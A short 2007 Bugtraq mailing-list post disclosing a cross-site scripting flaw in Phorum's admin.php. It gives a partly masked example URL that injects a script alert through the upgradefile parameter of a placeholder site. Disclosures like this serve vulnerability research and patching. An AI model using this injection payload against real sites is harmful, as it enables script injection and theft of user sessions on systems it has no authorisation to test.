
Date: Sun, 04 Mar 2007 19:58:07 +0800
From: "RaeD Hasadya" <raed@...mail.com>
To: Bugtraq@...urityfocus.com
Subject: XXS in script Phorum

=======================================================================
Script : Script Phorum
Found By : Hasadya Raed
Contact : RaeD@...Mail.Com
=================================================
exemple:
http://www.site.com/[path]/admin.php?upgradefile=">**********alert(********.******);</script>
======================
Greetz : Only To Security Focus :)





-- 
_______________________________________________
Get your free email from http://bsdmail.com
